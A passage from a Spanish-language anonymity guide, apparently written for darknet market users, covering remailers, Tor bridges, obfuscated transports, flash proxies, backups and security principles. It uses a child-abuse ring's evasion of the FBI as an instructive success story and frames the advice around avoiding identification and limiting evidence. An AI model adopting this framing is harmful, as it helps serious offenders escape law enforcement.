recibe mensajes (en este caso un correo electrónico) con instrucciones integradas sobre dónde enviarlos a continuación, y que los reenvía sin revelar de dónde provienen originalmente. Un servidor de nymserver también conocido como remailer pseudónimo asigna a sus usuarios un nombre de usuario, y mantiene una base de datos de instrucciones sobre cómo devolver mensajes al usuario real. Estas instrucciones generalmente involucran la red de remailer anónimo, protegiendo así la verdadera identidad del usuario. Algunas de las ventajas de usar estos servicios son proteger al destinatario de un adversario y también proteger al remitente del mensaje. Algunos de estos servicios usan lo que se llama un buzón común, en el que todos los mensajes se almacenan en un buzón central sin encabezados "A y desde". Depende de los usuarios que usan el servicio intentar usar sus claves PGP para tratar de descifrar todos los mensajes almacenados en el cuadro de mensaje central y ver si pueden descifrar alguno de ellos. Si pueden, este mensaje está destinado para ellos. De esta manera se descarta de nuevo, el emisor y el receptor. Este sistema de remailers, también puede formar una cadena, en la que el mensaje se recupera de múltiples repetidores antes de llegar a su destinatario previsto para ampliar la brecha entre el emisor y el receptor. Otra opción efectiva que ofrecen algunos servicios es la posibilidad de retrasar el envío del mensaje al siguiente servidor de la cadena o al propio destinatario. Si nos encuentra que estamos enviando tráfico cifrado PGP a través de algún tipo de análisis a las 5:00 PM, y otra persona que está siendo monitorizada lo recibe a las 5:01 PM, es más fácil correlacionar que este mensaje pudo venir de nosotros a la otra persona. Dejando de lado mis sentimientos personales sobre los pedófilos, trajimos este caso, como un ejemplo por varias razones: 1. La pornografía infantil es un delito grave en prácticamente todas las jurisdicciones y paises. Como demuestra este ejemplo, la policía trabajará en conjunto, incluso a través de fronteras nacionales, para investigar estos crímenes. Ellos están dispuestos invertir un tiempo considerable, mano de obra y dinero en la búsqueda de estos sospechosos. Los únicos otros crímenes que generalmente merecen este tipo de enfoque son el tráfico de drogas / armas o el terrorismo. El nivel de esfuerzo gastado en la búsqueda de este grupo se puede ver en que, incluso el el subdirector ejecutivo del FBI J. Stephen Tidwell estuvo involucrado.Normalmente, uno no esperaría que el personal del FBI de la dirección participase, esto muestra el nivel de importancia que se le otorga a esta particular investigación (Un año después, el mismo Yardbird, expresó el asombro de que el FBI considera a su grupo como una prioridad.) 2. Este caso es el único que conozco, donde los sospechosos utilizaban herramientas sofisticadas como PGP, Tor, remailers anónimos y nymservers. 3. Este caso subraya la efectividad de estas herramientas incluso contra oponentes poderosos y bien financiados como el FBI, Europol e Interpol. Aquellos que fueron atrapados utilizaron inapropiados herramientas y técnicas ineficaces para protegerse. 4. Entiendo completamente el disgusto de la mayoría de la gente por los tipos de crímenes / criminales discutidos aquí. Dicho esto, es importante recordar que uno simplemente no puede diseñar un sistema que proporcione protección para una clase de personas, pero se la niege a otra.No puedes, por ejemplo, implementar un sistema que proporcione privacidad / anonimato para los disidentes políticos, o los denunciantes, y se lo niega a los pedófilos, o todos están a salvo, o nadie Resumiendo, hemos visto que incluso los delincuentes más perseguidos pueden evadir la captura cuando usan criptografía robusta y sistemas de ciberseguridad de forma apropiada. El líder del Ring User de uno de los anillos de pornografía infantil más investigados todavía permanece prófugo hoy en día porque siguieron las reglas. ## Escondiendote de tu ISP - Puentes y transporte Esta parte del post va a hablar sobre algo que se ha discutido comúnmente ¿Cómo puedo ocultar mi uso de tor de mi ISP? La gente está más preocupada por ocultar su uso de TOR a su ISP, que por esconderlo en una VPN. Parece haber un debate de ida y vuelta sobre si usar una VPN nos protegerá o no. Si la VPN puede ser convencida o no para registrar nuestra conexión, etc. Hemos comentado anteriormente cómo los anillos de pedófilos, LulzSec y YardBird han demostrado que históricamente se sabe que quienes confían en las VPN para protegerse, terminan en la cárcel. Incluso nuestro amigo The Grugq indica que TOR -> VPN está bien, pero los que usan VPN -> TOR, van a la cárcel. Anteriormente hablamos sobre VPN -> TOR y TOR -> VPN, y tratamos de mantenernos neutrales. Pero recuerda, al final del día, nadie va a ir a la cárcel por ti. Si simplemente quieres ocultar el hecho de que estás utilizando a tu ISP, entonces tenemos otras opciones aparte de una VPN. Tenemos Bridges y varios transportes conectables diferentes. ¿Qué son los bridges y cómo podemos usarlos en Tails? ### Qué son los Bridges y cuándo usarlos Al utilizar TOR con Tails en su configuración predeterminada, cualquier persona pueda observar el tráfico de nuestra conexión a Internet (por ejemplo, tu proveedor de servicios de Internet y tal vez el gobierno y las agencias encargadas de hacer cumplir la ley) pueden saber que estámos utilizando TOR. ``` Esto puede ser un problema si se encuentra en un país donde se aplica lo siguiente: ``` 1. El uso de TOR está bloqueado por la censura: dado que todas las conexiones a Internet están obligadas a pasar por TOR, esto haría que Tails sea inútil para todo, excepto para trabajar sin conexión en documentos, etc. 2. Usar Tor es peligroso o se considera sospechoso: en este caso, iniciar Tails en su configuración predeterminada puede ocasionarte serios problemas. Los Bridges TOR, también llamados relés de puente Tor, son puntos de entrada alternativos a la red Tor que no están todos públicamente enumerados. El uso de un puente hace que sea más difícil, pero no imposible, que nuestro proveedor de servicios de Internet sepa que estamos utilizando TOR. Lo primero que vamos a hacer es obtener algunos puentes TOR. Debemos obtener los mismo antes de configurar Tails para usar puentes, porque una vez que Tails esté en modo bridge, no podremos conectarnos a tor sin puentes de trabajo. Deberías obtener una lista de puentes como se ve aquí. Estos son puentes reales extraídos de la página de puentes TOR. 5.20.130.121:9001 63dd98cd106a95f707efe538e98e7a6f92d28f94 106.186.19.58:443 649027f9ea9a8e115787425430460386e14e0ffa 69.125.172.116:443 43c3a8e5594d8e62799e96dc137d695ae4bd24b2 Estos puentes están disponibles públicamente en el sitio web de Tor Project, por lo que pueden ser o no la mejor opción para usar, pero son un buen comienzo. Otra opción es enviar un correo electrónico a bridges@bridges.torproject.org con un mensaje en el cuerpo que diga "get bridges" sin las comillas. Solo funcionará si se envía desde una cuenta de Gmail o Yahoo, desafortunadamente. Si deseamos usar esto, configura la cuenta de correo electrónico usando TOR y recibirás una lista de alrededor de 3 puentes poco después. Guárdalos en algún lugar donde los podamos usar la próxima vez que iniciemos Tails. Ya tenemos nuestros puentes. ¿Cómo usamos puentes en Tails? Esta es una opción que debemos activar cuando iniciamos Tails. Para activar el modo bridge, agregaremos la opción de inicio del puente al menú de inicio. El menú de inicio es la primera pantalla que aparece cuando se inicia Tails. Es la pantalla negra que dice Boot Tails y le da dos opciones. 1-Live, 2- Live (Fail Safe). Cuando se encuentre en esta pantalla, presione Tab y aparecerá una lista de opciones de inicio en forma de texto en la parte inferior de la pantalla. Para agregar una nueva opción de inicio, agrega un espacio y luego escribe "bridge" sin las comillas y presione Entrar. Ya hemos activado el modo puente. Una vez que Tails se inicie por completo, recibiremos una advertencia de que hemos ingresado al modo bridge y no eliminaremos la dirección IP predeterminada, que es 127.0.0.1. Este es un consejo que seguiremos, así que simplemente haz clic en Aceptar y aparecerá la ventana de configuración para TOR. En este punto, necesitamos agregar nuestros puentes. Cogemos los tres puentes que obtuvimos e ingresamos la dirección IP y el puerto. Si fuéramos a usar el ejemplo anterior, esto es a lo que ingresaríamos. 5.20.130.121:9001 106.186.19.58:443 69.125.172.116:443 Para cada puente que agreguemos , escríbelo en el cuadro de texto disponible donde dice "Agregar un puente" y luego haz clic en el botón verde + para agregar ese puente. Tendremos que agregar un puente cada vez. Una vez que hayamos terminado de agregar los bridges, podemos hacer clic en Aceptar. En este punto, nuestro ícono de cebolla amarilla en la esquina superior derecha se volverá verde poco después y se conectará a la red TOR mediante Bridge. Nuevamente, dado que es menos probable que tu ISP conozca estos puentes, es menos probable que sepan que estamos usando TOR cuando usamos Bridge. Sin embargo, es posible que deseemos buscar esos puentes antes de usarlos. Tal vez queramos saber dónde están ubicados, quizás queramos ver quién está alojando el bridge. Podemos hacerlo buscando un servicio de búsqueda de IP online, haciendo una búsqueda y escribiendo la dirección IP. Las tres IPs listadas arriba están ubicadas en las siguientes ubicaciones. ``` 5.20.130.121 - País: Lituania 106.186.19.58:443 - País: Japón 69.125.172.116:443 - País: Nueva Jersey, Estados Unidos ``` Y con eso, podemos decidir qué puente sería una mejor opción para nuestro uso. Sin embargo, sugiero que vayas y obtener nuevos puentes y que no utilices los que he enumerado anteriormente por razones obvias, ya que ahora están vinculados a los usuarios del blog. Debo señalar que la forma en que los bridges ocultan el hecho de que estamos usando TOR desde nuestro ISP, es que estamos conectado a una dirección IP que probablemente nuestro ISP desconoce si está afiliada a nodos de entrada TOR. Si bien los bridges son una buena idea, desafortunadamente pueden no ser suficientes. Según Jacob Applebaum, (un desarrollador de tor), el tráfico bridge sigue siendo vulnerable a algo llamado DPI (inspección profunda de paquetes) para identificar los flujos de tráfico de Internet por protocolo, en otras palabras, pueden indicar que estamos usando TOR mediante el análisis del tráfico. Mientras TOR utiliza relés puente para evitar una censor que bloquea por dirección IP, el censor puede usar DPI para reconocer y filtrar los flujos de tráfico incluso cuando se conectan a direcciones IP inesperadas. Es menos probable que nuestro ISP lo haga y es más probable que lo haga la NSA u otros gobiernos opresores como China e Irán. Últimamente, los censores han encontrado formas de bloquear TOR incluso cuando los clientes están utilizando puentes. Por lo general, lo hacen instalando cuadros en los ISP que miran el tráfico de la red y detectan TOR; cuando se detecta TOR, bloquean el flujo de tráfico. Para eludir esa censura tan sofisticada, TOR introdujo Pluggable Transports o puentes ofuscados. Estos puentes usan complementos especiales llamados transportes conectables que ofuscan el flujo de tráfico de TOR, lo que dificulta su detección. Los Pluggable Transports son una tecnología más nueva, pero menos comentada, que está siendo implementada por TOR para disfrazar el hecho de que estamos usando TOR por nuestro ISP y otros censores. Como se mencionó anteriormente, intenta transformar nuestro tráfico en un tráfico de aspecto inocente que con suerte no se distinguiría del tráfico normal de navegación web. Actualmente, los Pluggable Transports más populares son puentes ofuscados. La ofuscación, por definición, es la ocultación del significado pretendido en la comunicación, haciendo que la comunicación sea confusa, intencionalmente ambigua y más difícil de interpretar. Los puentes ofuscados en realidad transforman el tráfico para que parezcan paquetes de datos aleatorios. Los puentes ofuscados actualmente tienen 2 protocolos. 1. Obfs2 (The Twobfuscator). Para los no expertos, básicamente obfs2 usa un protocolo que disfraza el tráfico para que parezca información aleatoria, mientras que TOR tiene una estructura más distinta. Sin embargo, debe observarse en el caso de obfs2, que si un atacante snifa el "saludo inicial" entre el ordenador y el puente ofuscado, podría obtener la clave de encriptación utilizada para disfrazar nuestrp tráfico y usarlo para descifrar el tráfico disfrazado que revelaría el verdadero tráfico. No podrían descifrar tu tráfico, pero podrían ver que estás usando TOR. Es probable que esto no sea algo que nuestro ISP haría, pero puede ser algo que la aplicación de la ley o la NSA haría. Si solo estamos preocupado por nuestro ISP, obfs2 probablemente valdría. 1. Obfs3 (The Threebfuscator). Obfs3 usa un protocolo muy similar para disfrazar nuestro tráfico como obfs2, sin embargo, utiliza un método más avanzado de handshake inicial llamado intercambio de claves Diffie Hellman. Sin embargo, encontraron algunas vulnerabilidades en el protocolo y tuvieron que ir un paso más allá y personalizar el intercambio de claves de Diffie Hellman para que sea un método aún más sólido para establecer ese Handshake inicial. Usar obfs3 sería la mejor opción para "disfrazar" el tráfico si tu adversario es la NSA o las fuerzas del orden público. ¿cómo obtenemos esos puentes ofuscados? No son tan fáciles de obtener, pero se pueden obtener a través del correo electrónico anterior. Sin embargo, debemos solicitar esos puentes específicamente para obtenerlos. Debemos usar una cuenta de Gmail o Yahoo y enviar un correo electrónico a bridges@bridges.torproject.org e ingresar en el cuerpo del correo electrónico "transport obfs2" sin las comillas, y para obfs3, simplemente ingrese "transporte obfs3". Ten en cuenta que solo podemos enviar una solicitud a tor por correo electrónico, cada 3 horas. Cuál debemos usar, es nuestra elección. Introdúcelos de en este formato para que Tails sepa qué protocolo usar. obfs3 83.212.101.2:42782 obfs2 70.182.182.109:54542 TOR también proporciona algunos puentes ofuscados en su página de inicio que también podemos usar, y los enumerarémos a continuación. Si envíamos una solicitud a TOR y obtenemos una respuesta que contiene bridges sin obfs2 u obsf3 al principio de las líneas, estos son puentes normales, no ofuscados, y es probable que estemos fuera de los puentes ofuscados, teniendo que intentarlo nuevamente otro día. Si obtenemos una respuesta con bridges que no tienen obfs2 o 3 al comienzo de cada línea, ten en cuenta que estos son puentes normales, a diferencia de los que se muestran a continuación. obfs3 83.212.101.2:42782 obfs3 83.212.101.2:443 obfs3 169.229.59.74:31493 obfs3 169.229.59.75:46328 obfs3 209.141.36.236:45496 obfs3 208.79.90.242:35658 obfs3 109.105.109.163:38980 obfs3 109.105.109.163:47779 obfs2 83.212.100.216:47870 obfs2 83.212.96.182:46602 obfs2 70.182.182.109:54542 obfs2 128.31.0.34:1051 obfs2 83.212.101.2:45235 Tengo la sensación de que algunos de vosotros os sentireis inclinados a salir y obtener algunos puentes de obfs3 de inmediato, porque creen que son la mejor opción para mantenerse anónimos. Y ahora tienen el potencial de ser lo que esperan en ese sentido, a excepción de un gran defecto. El número de puentes obfs3 es limitado. Por lo tanto, mientras obfs3 es la opción más segura (ya tenemos obfs4), su número limitado de puentes disponibles nos uniría a un grupo pequeño que no nos brindaría mucho anonimato. En este momento, se necesita una mayor cantidad de bridges, y esto es un factor que debemos tener en cuenta cuando utilizamos bridges ofuscados. Una de las soluciones a este problema de escasez es ejecutar nuestro propio puente ofuscado. Si estamos interesado hacerlo, debemos, comprar algunos VPS y configurarlos como obxs obfs3 o obfs4. Una de las mejores opciones para hacerlo es de esta manera puediendo configurarlo para que sea un puente oculto privado y, por lo tanto, no lo daremos a conocer al público. Luego podemos conectarnos a nuestro propio puente privado obfs3/4. Pero nuevamente, asegúrate de confiar en ordenador que estamos utilizando, de lo contrario, no es más seguro que una VPN. Otra posible solución a la falta de puentes ofuscados puede ser otra opción de Pluggable Transports, algo llamado proxy flash. Cuando pensamos en un proxy flash, piensas en las características de un flash, de vida rápida y corta. Este protocolo fue desarrollado por un desarrollador de TOR que asistió a la Universidad de Stanford, y la idea es que las direcciones IP utilizadas cambien más rápido de lo que una agencia censuradora puede detectarlas, rastrearlas y bloquearlas. Este método es similar al uso de puentes normales, ya que oculta el hecho de que nos estamos conectando a direcciones IP que se sabe que están relacionadas con TOR, incluso cuando las direcciones IP del puente enumeradas por TOR son descubiertas por nuestro ISP o la policía. Sin embargo, esto no oculta el hecho de que estemos usando el programa si alguien está analizando nuestro tráfico usando DPI (inspección profunda de paquetes). El principal beneficio de esta opción es que los proxies son administrados por muchas personas en todo el mundo. Se ejecutan cuando los usuarios de Internet aleatorios visitan una página web con un complemento específico que convierte su navegador en un proxy siempre que estén en esa página. Básicamente estamos usando la conexión de otra persona a través de su navegador para conectarmos a un TOR. Solo estamos utilizando 1 conexión activa en cada momento, pero temos alrededor de 5 conexiones establecidas con diferentes proxies en caso de que nuestra conexión activa se caiga, entonces podemos comenzar a usar otro proxy en su lugar. A continuación hay otra explicación de cómo funciona este proceso. Además del cliente y el relé TOR, ofrecemos tres nuevas piezas. El cliente TOR se pone en contacto con el facilitador para anunciar que necesita una conexión (proxy). El facilitador es responsable de realizar un seguimiento de los clientes y los apoderados, y asignarlos a los demás. El proxy flash sondea al facilitador para los registros de los clientes, luego comienza una conexión con el cliente al recibir un petición. Los complementos de transporte en el cliente, retransmiten la conexión entre WebSockets y TCP simple. [Imagen: Proxy flash] Una sesión de muestra puede ser así: 1. El cliente inicia Tor y el programa de complemento de transporte del cliente (flashproxy-client), envía un registro al facilitador mediante una cita segura. El complemento de transporte del cliente comienza a escuchar una conexión remota. 2. Un proxy flash entra online y sondea al facilitador. 3. El facilitador devuelve un registro de cliente, informando al proxy flash dónde se conecta. 4. El proxy realiza una conexión saliente con el cliente, que es recibida por el complemento de transporte del cliente. 5. El proxy realiza una conexión de salida al plugin de transporte en el relé TOR y comienza a enviar y recibir datos entre el cliente y el relevo. En otras palabras, terminas yendo desde el ordenador, al proxy, luego al proxy y al tor retransmisor. ``` La razón por la que esto es necesario es porque el cliente no puede comunicarse directamente con el relevo. (Quizás el censor haya enumerado todos los relevos y los haya bloqueado por la dirección IP). En el diagrama de arriba, hay dos flechas que cruzan el límite del censor, esto es por lo qué pensamos que están justificados. La conexión inicial del cliente con el facilitador (el registro del cliente) es una comunicación de solo escritura de ancho de banda muy bajo que idealmente puede ocurrir solo una vez durante una sesión. Un protocolo de encuentro cuidadoso, lento y especializado puede proporcionar esta comunicación inicial. La conexión del proxy flash al cliente proviene de una dirección IP que el censor nunca había visto antes. Si estamos bloqueado en unos minutos, está bien, hay otros proxies alineados y esperando para proporcionar el servicio. ``` Sé que esto podría ser un poco complicado, pero realmente no es necesario que comprendas cómo funciona para beneficiarnos de él. También podríamos estar preguntando sobre alguien que simplemente bloquea su capacidad al conectarse con el facilitador (el proveedor de los "poderes"). Pero, la forma en que realmente se conecta con el facilitador es de una manera muy especial que ha diseñado tor, y esto está integrado en el plugin de transporte del proxy flash. La forma en que el cliente se registra con el facilitador es un paso de encuentro especial que no se comunica directamente con el facilitador, diseñado para ser encubierto y muy difícil de bloquear. La forma en que esto funciona en la práctica es que el complemento de transporte del cliente de proxy flash realiza una conexión TLS (HTTPS) a Gmail y envía un correo electrónico cifrado desde una dirección anónima ( nobody@localhost ) a una dirección especial de registro del facilitador. El facilitador revisa este buzón periódicamente, descifra los mensajes e inserta los registros que contienen. El resultado es que cualquier persona que pueda enviar correos electrónicos a una dirección de Gmail puede hacer una cita, incluso si el facilitador está bloqueado. Dos preguntas que te deberías estar haciendo: 1. ¿Puedo confiar en los proxies y / o facilitadores? 2. ¿Cómo uso esto? Bueno, el facilitador es elegido y actualmente solo lo dirige TOR, por lo que puedes tomarlo al pie de la letra. En lo que respecta a los proxies, los proxies en sí mismos pueden o no ser confiables, y este es el riesgo que corremos cada vez que usamos TOR. Los puentes que utilizas pueden verse comprometidos, tus nodos de entrada, tus nodos de salida, cada salto posible en el camino a internet puede verse comprometido en cualquier momento. Afortunadamente, incluso si el proxy está en peligro y registrando nuestro tráfico, solo podremos ver tráfico encriptado. Y como mencioné anteriormente, cualquiera que visite una página web con un complemento específico se convertirá en un proxy flash siempre que se encuentre en ese sitio. Esto significa que algunas personas serán un proxy flash sin su conocimiento, y otras serán representantes instantáneas porque quieren serlo. La idea detrás de esto es tener múltiples usuarios, decenas de miles, si no cientos de miles de servidores proxy flash disponibles en todo momento para aumentar la cantidad de direccionamiento IP posibles entre las que rotaría para mantener a nuestro ISP y posiblemente la NSA entretenidos. ¿Usamos esto? En realidad, actualmente no es compatible con Tails. Pero se puede usar con TOR Pluggable Transports y TOR Browser Bundle fuera de Tails, y podemos ver como configurarlo **aquí ** Básicamente se trata de habilitar el reenvío de puertos sobre el puerto 9000, agregando "bridge flashproxy 0.0.1.0:1" sin las comillas, a nuestro torrc, y dejar todo lo demás a menos que necesitemos usar un puerto diferente, lo cual es poco probable. Es posible que debamos hacer una excepción en nuestro firewall para el complemento flashproxy si nos lo pide. Siempre y cuando estemos utilizando el paquete Tor Browgable Transports Tor Browser, debería ser bastante fácil hacer funcionar esta característica. Intenta configurar puentes normales, luego intenta hacer los puentes ofuscados, y una vez que los obtengas, entonces, considera hacer los proxies flash para practicar. Házte algunas preguntas, ¿solo quiero ocultar el hecho de que estoy usando TOR desde mi ISP? ¿O me estoy escondiendo de alguien mucho más grande que eso? Considera si es plausible que ejecute un proxy privado ofuscado, o incluso un puente privado. Ya tienes suficiente información para tomar una decisión informada. Actualmente, hay otros transportes conectables actualmente en desarrollo, pero aún no estan implementados. Os contamos algunos proyectos: ScrambleSuit es un Pluggable Transports que protege contra los ataques de sondeo de seguimiento y también es capaz de cambiar su huella digital de red (distribución de la longitud del paquete, tiempos entre llegadas, etc.). Es parte del marco Obfsproxy. Página oficial. Mantenido por Philipp Winter. ``` Estado: no desplegado ``` StegoTorus es una bifurcación de Obfsproxy que la extiende a - Divide corrientes TOR a través de conexiones múltiples para evitar firmas de tamaño de paquete. - Incorpora los flujos de tráfico en trazas que se parezcan a html, javascript o pdf.Mantenido por Zack Weinberg. Estado: no desplegado SkypeMorph transforma los flujos de tráfico de TOR para que se vean como Video de Skype. Podéis descargaroslo aqui. Mantenido por Ian Goldberg. ``` Estado: no desplegado ``` El objetivo de Dust es proporcionar un protocolo resistente a DPI basado en paquetes (en lugar de en conexiones). Mantenido por Brandon Wiley. ``` Estado: no desplegado ``` El Cifrado de Transformación de Formato (FTE) transforma el tráfico TOR en formatos arbitrarios usando las descripciones de idioma. Documento de investigación. ``` Estado: no desplegado ``` ## Capacidades de la NSA Quería compartir con vosotros un video de 1 hora de uno de los desarrolladores de TOR, Jacob Applebaum. [Vídeo](https://www.youtube.com/watch?v=amn377h7gqw) Jacob habla sobre las capacidades legitimadas y confirmadas de la NSA de los documentos filtrados de la FOIA que muestran cuán técnicamente capaz es la NSA. En cualquier lugar, desde simples puertas traseras, volando un avión no tripulado sobre la parte superior de nuestra casa para esnifar paquetes, moldear inyectando chips de puerta trasera en la carcasa de el ordenador, y transferir energía a nuestra casa. Nada de esto es teoría de la conspiración, todo está confirmado con los documentos que se muestran en su presentación. ## Por qué siempre debemos respaldar las transmisiones > Esto es una historia embarazosa de algo que ha sucedió en los últimos días, y fue una lección bien aprendida, ya que algunas de las cosas que he perdido no serán recuperables. - Jolly Roger ¿Tienes un wallet de Bitcoin guardados en una unidad flash? ¿Qué pasaría si perdiesemos nuestra memoria USB? ¿Tenemos respaldo? ¿Qué pasaría si tus archivos se corrompieran y no pudieramos recuperarlos, podríamos vivir con eso? ¿Tienes ciertas cosas que nos causarían un gran problema si las perdiesemos? Entonces, es mejor que comiences a hacer copias de seguridad de tus discos con regularidad, mejor aún, ¡ hazlo todos los días ! Soy del tipo de personas que generalmente realiza copias de seguridad de sus archivos con regularidad, pero desafortunadamente a la gran cantidad de eventos extraños que ocurren online últimamente con Utopia derribado, foros de BMR siendo confiscados y demás, no había respaldado mis archivos en aproximadamente 2 semanas. Tenía todos mis archivos más recientes, incluyendo algunos nuevos monederos de Bitcoin con saldos en ellos en mi unidad portátil principal, y además, esta unidad estaba encriptada. Entonces, sin previo aviso, de repente recibí un error de que el sistema de archivos estaba dañado y mi disco no se podía leer. No importa, si tienes una unidad no cifrada, simplemente puedes ejecutar un programa de recuperación de datos como testdisk . Instalalo cuanto antes: sudo apt-get install testdisk Al utilizar este programa, es probable que podamos recuperar la mayoría de nuestros archivos porque ignora los encabezados del sistema de archivos y otros tipos de organización de archivos necesarios para identificar la forma en que se almacenan los mismos. El problema en mi caso, fue que todos mis archivos fueron encriptados. Esto significa que para descifrar los archivos, necesitaba un archivo de clave que se almacena en la unidad para desbloquear los mismos. Si este archivo de clave se daña, incluso si tenemos la contraseña para los archivos, no los recuperaremos. La clave es exclusiva de esa instancia particular cuando se cifró la unidad. Lo que significa que incluso si tratamos de volver a crear el archivo de clave con la misma contraseña, el resultado sería un archivo de clave diferente. Esto significa esencialmente que mis datos son irrecuperables, porque mi archivo de claves estaba corrupto de alguna manera. La tecnología es delicada, los datos se almacenan en forma de frecuencias magnéticas y no hay garantía de que los archivos no se corrompan un día sin razón aparente. Inundación, huracanes, sobrevoltaje, incendio, daños por humedad, pisar accidentalmente el disco, un miembro de la familia (generalmente un niño) lo rompe, lo pierde, derrama agua sobre él, sobre calentamiento, etc. Todo esto podría ocasionar que tus datos o unidades se dañen y pierdan todos sus datos. Es por eso que necesita un mínimo de 2 copias de seguridad. No 1, sino 2. Y ten una de tus copias de seguridad almacenadas preferiblemente fuera de tu hogar. Si trabajas, almacénelo en el trabajo o en tu coche, o en algún lugar al que puedas acceder regularmente, y trata de hacer una copia de seguridad de tus datos con la mayor frecuencia posible. Si tu casa se quema y mantenemos todas las copias de seguridad en casa, perdemos todo. Si conservaste una copia en el trabajo, puedes recuperarlo. Cuantas más copias de seguridad, mejor, siempre que estén cifradas. Cada vez que creemos un nuevo wallet y transfiramos Bitcoin a ella, haz una copia de seguridad. Cada vez que configures una nueva cuenta o un nuevo correo electrónico con una contraseña única (debería ser cada vez una), haz una copia de seguridad. Haz copia de seguridad de todo. Por suerte para mí, mi wallet principal era recuperable con la mayoría de mis monedas, pero perdí algunas monedas, que nunca puede recuperar, confía en mí, lo intenté de verdad. Obtener unidades USB adicionales o tarjetas SD es muy barato, por lo que debemos gastarnos unos euros extra para tener copias de seguridad múltiples, podrían terminar perdiendo datos que costarían mucho más de lo que hubiese costado tener algunas unidades adicionales por ahí como copias de seguridad. ## Hablemos de seguridad A raíz del exploit Freedom Hosting, creo que deberíamos reevaluar nuestro modelo de amenaza y actualizar nuestra seguridad para protegernos mejor de las amenazas reales a las que nos enfrentamos. Por ello escribimos este post para iniciar una larga conversación pero de ninguna forma es integral, nos enfocamos en la seguridad técnica. Quizás otros puedan abordar el envío y la seguridad financiera. Agradecemos tus comentarios y nos gustaría que estas ideas fuesen criticadas, pero tambien ampliadas. Mientras se desarrollaba este post, decidímos dar un paso atrás y hacernos una pregunta básica: ¿cuáles son nuestros objetivos? Me he propuesto dos objetivos básicos que queremos lograr con nuestra seguridad técnica. 1. Evita ser identificado. 2. Minimiza el daño cuando somos identificados. Podemos pensar en estos puntos como nuestros "guía de principios de seguridad ". Si tienes una pregunta de seguridad técnica, puedes llegar a una respuesta haciéndote estas preguntas: 1. ¿El uso de esta tecnología aumenta o disminuye las posibilidades de que me identifiquen? 2. ¿El uso de esta tecnología aumenta o disminuye el daño (p. Ej., La evidencia que se puede usar en mi contra) cuando me identifican? Obviamente, deberemos comprender la tecnología subyacente para responder estas preguntas. El resto de esta guía explica las amplias características tecnológicas que disminuyen las posibilidades de que seamos identificados y que minimizan el daño cuando somos identificados. Hacia el final, enumero tecnologías específicas y las evalúo basadas en estas características. En primer lugar, permítanme enumerar las amplias características que se me han ocurrido, y luego las explicaré. 1. Simplicidad 2. Confiabilidad 3. Ejecución mínima del código que no es de confianza 4. Aislamiento 5. Cifrado Hasta cierto punto, nos hemos estado enfocando en cosas equivocadas. Principalmente me han preocupado los ataques a la capa de red o los "ataques a la red TOR", pero ahora me parece claro que es mucho más probable que los ataques de la capa de aplicación nos identifiquen. Las aplicaciones que ejecutamos sobre TOR son una superficie de ataque mucho más grande que TOR. Podemos minimizar nuestras posibilidades de ser identificados asegurando las aplicaciones que ejecutamos sobre TOR. ### Simplicidad en Ciberseguridad A menos que no usemos ordenador, podemos minimizar las amenazas contra nosotros simplificando las herramientas tecnológicas que usamos. Es menos probable que una base de código más pequeña tenga errores, incluidas vulnerabilidades deanonimización. Es menos probable que una aplicación más simple se comporte de formas inesperadas y no deseada. Como ejemplo, cuando el Proyecto TOR evaluó las huellas dejadas por el paquete del navegador, encontraron 4 rastros en Debian Squeeze, que usa el entorno de escritorio Gnome 2, y 25 huellas en Windows 7. Está claro que Windows 7 es más complejo y se comporta de formas más inesperadas que Gnome 2. Solo a través de su complejidad, Windows 7 aumenta su superficie de ataque y lo expone a más amenazas potenciales. (Aunque hay otras formas en que Windows 7 también lo hace más vulnerable). Las huellas que quedan en Gnome 2 son más fáciles de prevenir que las huellas dejadas en Windows 7, por lo que al menos con respecto a esta amenaza específica, Gnome 2 es deseable en Windows 7. Entonces, al evaluar una nueva herramienta tecnológica por simplicidad, debemos hacernos estas preguntas: ¿Es más o menos complejo que la herramienta que estoy usando actualmente? ¿Realiza más o menos funciones (innecesarias) que la herramienta que estoy usando actualmente? ### Confiabilidad en Ciberseguridad Deberíamos favorecer las tecnologías que son construidas por profesionales o personas con muchos años de experiencia en lugar de newbs. Un claro ejemplo de esto es CryptoCat, que fue desarrollado por un programador aficionado bien intencionado, y ha sufrido severas críticas debido a las muchas vulnerabilidades que se han descubierto. Deberíamos favorecer las tecnologías que son de código abierto, tienen una gran base de usuarios y un largo historial de uso, ya que se revisarán más a fondo. Al evaluar una nueva herramienta tecnológica para la confiabilidad, hazte estas preguntas: - ¿Quién escribió o construyó esta herramienta? - ¿Cuánta experiencia tiene? - ¿Es de código abierto y cómo de grande es la comunidad de usuarios, revisores y colaboradores? ### La ejecución mínima del código que no es de confianza Las dos primeras características suponen que el código es de confianza, pero tenemos posibles problemas no deseados. Esta característica supone que, como parte de nuestras actividades de rutina, es posible que tengamos que ejecutar un código arbitrario que no sea de confianza. Este es un código que no podemos evaluar de antemano. El principal lugar donde esto sucede es en el navegador, a través de complementos y scripts. Deberíamos evitar por completo ejecutar código que no sea de confianza, si es posible. Hazte estas preguntas: - ¿Son las características que proporciona absolutamente necesarias? - ¿Hay alternativas que brinden estas características sin requerir a complementos o scripts? ### Aislamiento en Ciberseguridad El aislamiento es la separación de componentes tecnológicos con barreras. Minimiza el daño ocasionado por los exploits, por lo que si se explota un componente, otros componentes seguirán protegidos. Puede ser nuestra última línea de defensa contra los exploits de la capa de aplicación. Los dos tipos de aislamiento son, físicos (o basados en hardware) y virtuales (o basados en software). El aislamiento físico es más seguro que el aislamiento virtual, porque las barreras basadas en software pueden ser explotadas por códigos maliciosos. Preferimos el aislamiento físico sobre el aislamiento virtual. Al evaluar las herramientas de aislamiento virtual, hazte las mismas preguntas sobre la simplicidad y la confiabilidad en ciberseguridad. ¿Esta tecnología de virtualización realiza funciones innecesarias (como proporcionar un portapapeles compartido)? ¿Cuánto tiempo ha estado en desarrollo y cuán exhaustivamente se ha revisado? ¿Cuántos exploits se han encontrado? ### Cifrado en Ciberseguridad La encriptación es una de las dos defensas que tenemos para minimizar el daño cuando somos identificados. Cuanta más encriptación usemos, mejor estará. En un mundo ideal, todos sus medios de almacenamiento estarían encriptados, junto con cada correo electrónico y mensaje que enviemos. La razón de esto es porque, cuando algunos correos electrónicos se cifran pero otros no, un atacante puede identificar fácilmente los correos electrónicos interesantes. Podemos aprender con quién se comunica con las partes interesantes, porque esas serán a las que se enviarán correos electrónicos encriptados (esto se conoce como fuga de metadatos). Los mensajes interesantes se pierden con el ruido cuando todo está encriptado. Lo mismo ocurre con el cifrado de medios de almacenamiento. Si almacenamos un archivo encriptado en un disco duro no encriptado, un adversario puede determinar trivialmente que todo lo bueno está en ese pequeño archivo o en los cifrados. Pero 